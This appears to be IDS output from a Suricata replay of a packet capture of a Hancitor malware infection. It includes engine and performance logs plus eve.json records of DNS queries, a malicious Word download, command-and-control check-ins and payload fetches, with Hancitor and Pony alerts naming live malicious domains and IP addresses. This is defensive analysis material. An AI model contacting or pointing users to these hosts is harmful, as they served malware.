29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_host": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver dns_query": 4
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver tls_sni": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver file_data": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient file_data": 7
29/3/2019 -- 07:44:06 - <Perf> - Registered 39590 rule profiling counters.
29/3/2019 -- 07:44:06 - <Info> - fast output device (regular) initialized: alert
29/3/2019 -- 07:44:06 - <Info> - eve-log output device (regular) initialized: eve.json
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'alert'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'http'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'dns'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'tls'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'files'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'ssh'
29/3/2019 -- 07:44:06 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
29/3/2019 -- 07:44:06 - <Info> - stats output device (regular) initialized: stats.log
29/3/2019 -- 07:44:06 - <Config> - AutoFP mode using "Hash" flow load balancer
29/3/2019 -- 07:44:06 - <Info> - reading pcap file /var/pcap/03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pon

This file has been truncated.


packet_stats.log - (12163 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6           833          3960788      312809277     189088650        157.5b   99.14
 IPv4      17            10         15870487      184984441     137206223          1.4b    0.86
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6           833            67778       16170263        403930        336.5m   96.88
TMM_FLOWWORKER              IPv4      17            10           432562        1117527        582178          5.8m    1.68
TMM_RECEIVEPCAPFILE         IPv4       6           826             2549           4555          3021          2.5m    0.72
TMM_RECEIVEPCAPFILE         IPv4      17            10             2809           9944          3600         36.0k    0.01
TMM_DECODEPCAPFILE          IPv4       6           826             2658          31410          2906          2.4m    0.69
TMM_DECODEPCAPFILE          IPv4      17            10             2768          38291          6483         64.8k    0.02

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6           826             2750          26797          3287          2.7m  0.84  
flow                    IPv4      17            10             3124          20246          6087         60.9k  0.02  
stream                  IPv4       6           833             2934         361058          8964          7.5m  2.30  
app-layer               IPv4      17            10            10111          74765         24033        240.3k  0.07  
detect                  IPv4       6           833            45331       15804806        369620        307.9m  94.69 
detect                  IPv4      17            10           339471         658592        426943          4.3m  1.31  
tcp-prune               IPv4       6           833             2554          16448          3004          2.5m  0.77  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            10             2958          16030          6546         65.5k  44.98 
dns                     IPv4      17            10             4653          21370          8008         80.1k  55.02 
Proto detect            IPv4      17            10             5305          42446         17215        172.2k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            11            30032          85001         41489        456.4k  10.07 
LOGGER_UNIFIED2             IPv4       6            11            23878         122587         54830        603.1k  13.30 
LOGGER_JSON_ALERT           IPv4       6            11            49392         100943         66698        733.7k  16.18 
LOGGER_JSON_DNS             IPv4      17            10            33275         336131        109195          1.1m  24.09 
LOGGER_JSON_HTTP            IPv4       6             9            36119         147207         72001        648.0k  14.29 
LOGGER_JSON_FILE            IPv4       6            12            47309         181284         83375          1.0m  22.07 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           539             2575         153562         19521        10.5m  9.47  
payload                           IPv4      17            10            13899          94665         32151       321.5k  0.29  
stream                            IPv4       6           539             2544         923385         37689        20.3m  18.28 
http_uri                          IPv4       6             9             4953          29868         18288       164.6k  0.15  
http_request_line                 IPv4       6             9             4839          19819          7573        68.2k  0.06  
http_client_body                  IPv4       6            11             2755          45027         13444       147.9k  0.13  
http_header (request)             IPv4       6             9            28761         153921         75931       683.4k  0.61  
http_header (request trailer)     IPv4       6             9             2643           3489          2806        25.3k  0.02  
http_header_names (request)       IPv4       6             9            10860        5069925        577636         5.2m  4.68  
http_accept (request)             IPv4       6             9             2993           9246          4090        36.8k  0.03  
http_referer (request)            IPv4       6             9             2863           3800          3149        28.3k  0.03  
http_content_len (request)        IPv4       6             9             2892           5246          3873        34.9k  0.03  
http_content_type (request)       IPv4       6             9             2855          12834          5530        49.8k  0.04  
http_protocol (request)           IPv4       6             9             3520           6428          4613        41.5k  0.04  
http_start (request)              IPv4       6             9             9169          20125         12736       114.6k  0.10  
http_raw_header (request)         IPv4       6            11             8572          18526         12636       139.0k  0.13  
http_method                       IPv4       6             9             4719           7803          5739        51.7k  0.05  
http_cookie (request)             IPv4       6             9             2932           4375          3425        30.8k  0.03  
http_raw_uri                      IPv4       6             9             3019           6404          4853        43.7k  0.04  
http_user_agent                   IPv4       6             9            14055          44279         27875       250.9k  0.23  
http_host                         IPv4       6             9             5137           9696          6789        61.1k  0.05  
dns_query                         IPv4      17             5             6439          13726          9596        48.0k  0.04  
http_response_line                IPv4       6             9             3816          10112          8027        72.2k  0.07  
http_header (response)            IPv4       6             9            21727          48353         34361       309.3k  0.28  
http_header (response trailer)    IPv4       6             9             2603           4397          3121        28.1k  0.03  
http_content_type (response)      IPv4       6             9             3164          10808          5953        53.6k  0.05  
http_raw_header (response)        IPv4       6           508             4054          36169          4745         2.4m  2.17  
http_cookie (response)            IPv4       6             9             2995           4189          3303        29.7k  0.03  
http_stat_code                    IPv4       6             9             2897           5201          4043        36.4k  0.03  
file_data (http response)         IPv4       6           499             2587       13284447        139893        69.8m  62.82 
Total                             IPv4                  2320                                         47898       111.1m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6            12             8961          59073         30746        369.0k  0.08  
PROF_DETECT_IPONLY          IPv4      17            10            36877          83222         46861        468.6k  0.10  
PROF_DETECT_RULES           IPv4       6           833             2538        6559620        150991        125.8m  26.29 
PROF_DETECT_RULES           IPv4      17            10           195084         355661        247500          2.5m  0.52  
PROF_DETECT_STATEFUL_START    IPv4       6           447             5109        1928616        140387         62.8m  13.12 
PROF_DETECT_STATEFUL_CONT    IPv4       6           833             2578          89341         13028         10.9m  2.27  
PROF_DETECT_STATEFUL_CONT    IPv4      17            10             5736          54485         10993        109.9k  0.02  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           809             2557          32979          2823          2.3m  0.48  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            10             2695          14379          4030         40.3k  0.01  
PROF_DETECT_PREFILTER       IPv4       6           833             7901       13475870        165131        137.6m  28.76 
PROF_DETECT_PREFILTER       IPv4      17            10            47512         120914         66116        661.2k  0.14  
PROF_DETECT_PF_PAYLOAD      IPv4       6           539            14291         934073         65384         35.2m  7.37  
PROF_DETECT_PF_PAYLOAD      IPv4      17            10            19261          99837         37454        374.5k  0.08  
PROF_DETECT_PF_TX           IPv4       6           809             2555       13298602        105928         85.7m  17.91 
PROF_DETECT_PF_TX           IPv4      17             5            12112          21259         15671         78.4k  0.02  
PROF_DETECT_PF_SORT1        IPv4       6           329             2545          44067          3890          1.3m  0.27  
PROF_DETECT_PF_SORT1        IPv4      17            10             3787           6078          4463         44.6k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6           833             2523          29173          2925          2.4m  0.51  
PROF_DETECT_PF_SORT2        IPv4      17            10             2936           8417          3862         38.6k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6           833             2531          33696          2880          2.4m  0.50  
PROF_DETECT_NONMPMLIST      IPv4      17            10             2897           3724          3124         31.2k  0.01  
PROF_DETECT_ALERT           IPv4       6           833             2527          32282          2789          2.3m  0.49  
PROF_DETECT_ALERT           IPv4      17            10             2534          16404          4028         40.3k  0.01  
PROF_DETECT_CLEANUP         IPv4       6           833             2571          16310          2872          2.4m  0.50  
PROF_DETECT_CLEANUP         IPv4      17            10             3026           4941          3622         36.2k  0.01  
PROF_DETECT_GETSGH          IPv4       6           833             2527          27499          3038          2.5m  0.53  
PROF_DETECT_GETSGH          IPv4      17            10             5630           6766          6149         61.5k  0.01  


stats.log - (2911 bytes)
------------------------------------------------------------------------------------
Date: 3/29/2019 -- 07:44:08 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 836
decoder.bytes                              | Total                     | 740503
decoder.ipv4                               | Total                     | 836
decoder.ethernet                           | Total                     | 836
decoder.tcp                                | Total                     | 826
decoder.udp                                | Total                     | 10
decoder.avg_pkt_size                       | Total                     | 885
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 6
flow.udp                                   | Total                     | 5
tcp.sessions                               | Total                     | 6
tcp.syn                                    | Total                     | 6
tcp.synack                                 | Total                     | 6
tcp.rst                                    | Total                     | 1
detect.alert                               | Total                     | 11
detect.mpm_list                            | Total                     | 5
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 5
app_layer.flow.http                        | Total                     | 6
app_layer.tx.http                          | Total                     | 9
app_layer.flow.dns_udp                     | Total                     | 5
app_layer.tx.dns_udp                       | Total                     | 5
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 10
flow_mgr.flows_notimeout                   | Total                     | 9
flow_mgr.flows_timeout                     | Total                     | 1
flow_mgr.flows_timeout_inuse               | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65526
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7077472


eve.json - (26253 bytes)
{"timestamp":"2018-12-20T15:22:53.562141+0000","flow_id":730838946649053,"pcap_cnt":1,"event_type":"dns","src_ip":"10.12.20.101","src_port":62743,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62625,"rrname":"louisianarxcoupon.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:22:53.901771+0000","flow_id":730838946649053,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":62743,"proto":"UDP","dns":{"type":"answer","id":62625,"rcode":"NOERROR","rrname":"louisianarxcoupon.com","rrtype":"A","ttl":5,"rdata":"47.90.254.148"}}
{"timestamp":"2018-12-20T15:22:53.901771+0000","flow_id":730838946649053,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":62743,"proto":"UDP","dns":{"type":"answer","id":62625,"rcode":"NOERROR","rrname":"louisianarxcoupon.com","rrtype":"NS","ttl":5,"rdata":"b.dnspod.com"}}
{"timestamp":"2018-12-20T15:22:53.901771+0000","flow_id":730838946649053,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":62743,"proto":"UDP","dns":{"type":"answer","id":62625,"rcode":"NOERROR","rrname":"louisianarxcoupon.com","rrtype":"NS","ttl":5,"rdata":"c.dnspod.com"}}
{"timestamp":"2018-12-20T15:22:53.901771+0000","flow_id":730838946649053,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":62743,"proto":"UDP","dns":{"type":"answer","id":62625,"rcode":"NOERROR","rrname":"louisianarxcoupon.com","rrtype":"NS","ttl":5,"rdata":"a.dnspod.com"}}
{"timestamp":"2018-12-20T15:22:54.942662+0000","flow_id":251868488779290,"pcap_cnt":52,"event_type":"alert","src_ip":"47.90.254.148","src_port":80,"dest_ip":"10.12.20.101","dest_port":49169,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019837,"rev":3,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-12-20T15:22:55.062240+0000","flow_id":251868488779290,"pcap_cnt":80,"event_type":"alert","src_ip":"47.90.254.148","src_port":80,"dest_ip":"10.12.20.101","dest_port":49169,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810419,"rev":1,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:22:55.229956+0000","flow_id":251868488779290,"pcap_cnt":116,"event_type":"alert","src_ip":"47.90.254.148","src_port":80,"dest_ip":"10.12.20.101","dest_port":49169,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2022303,"rev":3,"signature":"ET TROJAN ASCII Executable Inside of MSCOFF File DL Over HTTP","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:22:57.020877+0000","flow_id":251868488779290,"pcap_cnt":274,"event_type":"http","src_ip":"10.12.20.101","src_port":49169,"dest_ip":"47.90.254.148","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"louisianarxcoupon.com","url":"\/?861ALEL=YHmQV1GOYGQBSOFSGSQJPSBOQZCQi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2018-12-20T15:25:46.720993+0000","flow_id":1872149207449697,"pcap_cnt":276,"event_type":"dns","src_ip":"10.12.20.101","src_port":64354,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34095,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":5,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":5,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.123.39"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.204.36.156"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.221.234.215"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.21.121.219"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.23.114.123"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.16.248.221"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"us-east-1.elb.amazonaws.com","rrtype":"NS","ttl":5,"rdata":"ns-1793.awsdns-32.co.uk"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"us-east-1.elb.amazonaws.com","rrtype":"NS","ttl":5,"rdata":"ns-1119.awsdns-11.org"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"us-east-1.elb.amazonaws.com","rrtype":"NS","ttl":5,"rdata":"ns-934.awsdns-52.net"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"us-east-1.elb.amazonaws.com","rrtype":"NS","ttl":5,"rdata":"ns-235.awsdns-29.com"}}
{"timestamp":"2018-12-20T15:25:47.005825+0000","flow_id":377556423042032,"pcap_cnt":284,"event_type":"alert","src_ip":"10.12.20.101","src_port":49172,"dest_ip":"54.243.123.39","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021997,"rev":3,"signature":"ET POLICY External IP Lookup api.ipify.org","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:25:47.005825+0000","flow_id":377556423042032,"pcap_cnt":284,"event_type":"http","src_ip":"10.12.20.101","src_port":49172,"dest_ip":"54.243.123.39","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"api.ipify.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/plain"}}
{"timestamp":"2018-12-20T15:25:47.013951+0000","flow_id":1842887595341439,"pcap_cnt":285,"event_type":"dns","src_ip":"10.12.20.101","src_port":64803,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11452,"rrname":"torsgotuldrat.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:25:47.778936+0000","flow_id":1842887595341439,"pcap_cnt":286,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64803,"proto":"UDP","dns":{"type":"answer","id":11452,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"A","ttl":5,"rdata":"217.23.139.203"}}
{"timestamp":"2018-12-20T15:25:47.778936+0000","flow_id":1842887595341439,"pcap_cnt":286,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64803,"proto":"UDP","dns":{"type":"answer","id":11452,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"NS","ttl":5,"rdata":"ns4.cnmsn.com"}}
{"timestamp":"2018-12-20T15:25:47.778936+0000","flow_id":1842887595341439,"pcap_cnt":286,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64803,"proto":"UDP","dns":{"type":"answer","id":11452,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"NS","ttl":5,"rdata":"ns3.cnmsn.com"}}
{"timestamp":"2018-12-20T15:25:48.598795+0000","flow_id":424689394247739,"pcap_cnt":294,"event_type":"alert","src_ip":"10.12.20.101","src_port":49173,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2819978,"rev":5,"signature":"ETPRO TROJAN Tordal\/Hancitor\/Chanitor Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:25:48.598795+0000","flow_id":424689394247739,"pcap_cnt":294,"event_type":"http","src_ip":"10.12.20.101","src_port":49173,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"torsgotuldrat.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-12-20T15:25:48.598795+0000","flow_id":424689394247739,"pcap_cnt":294,"event_type":"fileinfo","src_ip":"10.12.20.101","src_port":49173,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","http":{"hostname":"torsgotuldrat.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1550},"app_proto":"http","fileinfo":{"filename":"\/4\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":129,"tx_id":0}}
{"timestamp":"2018-12-20T15:25:48.600055+0000","flow_id":1599663597430775,"pcap_cnt":295,"event_type":"dns","src_ip":"10.12.20.101","src_port":50093,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49915,"rrname":"mercurysroadie.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:25:48.706217+0000","flow_id":1599663597430775,"pcap_cnt":296,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":50093,"proto":"UDP","dns":{"type":"answer","id":49915,"rcode":"NOERROR","rrname":"mercurysroadie.com","rrtype":"A","ttl":5,"rdata":"45.40.149.34"}}
{"timestamp":"2018-12-20T15:25:48.706217+0000","flow_id":1599663597430775,"pcap_cnt":296,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":50093,"proto":"UDP","dns":{"type":"answer","id":49915,"rcode":"NOERROR","rrname":"mercurysroadie.com","rrtype":"NS","ttl":5,"rdata":"ns52.domaincontrol.com"}}
{"timestamp":"2018-12-20T15:25:48.706217+0000","flow_id":1599663597430775,"pcap_cnt":296,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":50093,"proto":"UDP","dns":{"type":"answer","id":49915,"rcode":"NOERROR","rrname":"mercurysroadie.com","rrtype":"NS","ttl":5,"rdata":"ns51.domaincontrol.com"}}
{"timestamp":"2018-12-20T15:25:49.015213+0000","flow_id":594559645829544,"pcap_cnt":345,"event_type":"alert","src_ip":"45.40.149.34","src_port":80,"dest_ip":"10.12.20.101","dest_port":49174,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:25:49.094666+0000","flow_id":594559645829544,"pcap_cnt":361,"event_type":"http","src_ip":"10.12.20.101","src_port":49174,"dest_ip":"45.40.149.34","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mercurysroadie.com","url":"\/wp-content\/plugins\/contact-widgets\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-12-20T15:25:55.050408+0000","flow_id":2023933352330472,"pcap_cnt":362,"event_type":"dns","src_ip":"10.12.20.101","src_port":52595,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26573,"rrname":"torsgotuldrat.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:25:55.155359+0000","flow_id":2023933352330472,"pcap_cnt":363,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":52595,"proto":"UDP","dns":{"type":"answer","id":26573,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"A","ttl":5,"rdata":"217.23.139.203"}}
{"timestamp":"2018-12-20T15:25:55.155359+0000","flow_id":2023933352330472,"pcap_cnt":363,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":52595,"proto":"UDP","dns":{"type":"answer","id":26573,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"NS","ttl":5,"rdata":"ns4.cnmsn.com"}}
{"timestamp":"2018-12-20T15:25:55.155359+0000","flow_id":2023933352330472,"pcap_cnt":363,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":52595,"proto":"UDP","dns":{"type":"answer","id":26573,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"NS","ttl":5,"rdata":"ns3.cnmsn.com"}}
{"timestamp":"2018-12-20T15:25:55.561158+0000","flow_id":206462106427810,"pcap_cnt":369,"event_type":"alert","src_ip":"10.12.20.101","src_port":49175,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:25:56.114609+0000","flow_id":206462106427810,"pcap_cnt":373,"event_type":"fileinfo","src_ip":"10.12.20.101","src_port":49175,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","http":{"hostname":"torsgotuldrat.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":207,"tx_id":0}}
{"timestamp":"2018-12-20T15:25:56.116021+0000","flow_id":206462106427810,"pcap_cnt":375,"event_type":"http","src_ip":"10.12.20.101","src_port":49175,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"torsgotuldrat.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR

This file has been truncated.


unified2.alert.1553845446 - (28681 bytes) - download
4\³ÎbFÑý/Zþ”
ePÀ¬\³Î\³ÎbFE‚i/Zþ”
ePÀPáɝêµ¾BÊqk¶S˜œ1é
